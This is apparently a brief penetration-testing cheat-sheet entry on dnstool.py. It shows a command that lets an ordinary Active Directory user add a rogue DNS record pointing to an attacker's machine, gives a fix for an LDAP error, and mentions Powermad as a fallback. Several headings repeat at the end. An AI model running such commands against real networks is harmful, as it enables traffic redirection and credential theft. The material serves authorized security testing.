dnstool.py

This script helps you add DNS records to the domain (which members of Domain Users can by default):

Add a rogue DNS record that points to your attacking box

dnstool.py -u 'tangent\any-valid-AD-user' -p 'Supersecretpassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER

If you get an error like this:

[!] LDAP operation failed. Message returned from server: noSuchObject 0000208D: NameErr: DSID-0310023C, problem 2001 (NO_OBJECT), data 0, best match of:
        'CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com'

Then rerun the command but add --legacy flag to the command.

Issues with adding DNS records

I had a test recently where the tool was throwing errors having to do with LDAP/SSL, and long story short, it was easier to add the record on the Windows side with Powermad.

Add a rogue DNS record that points to your attacking box​

Issues with adding DNS records​

Add a rogue DNS record that points to your attacking box

Issues with adding DNS records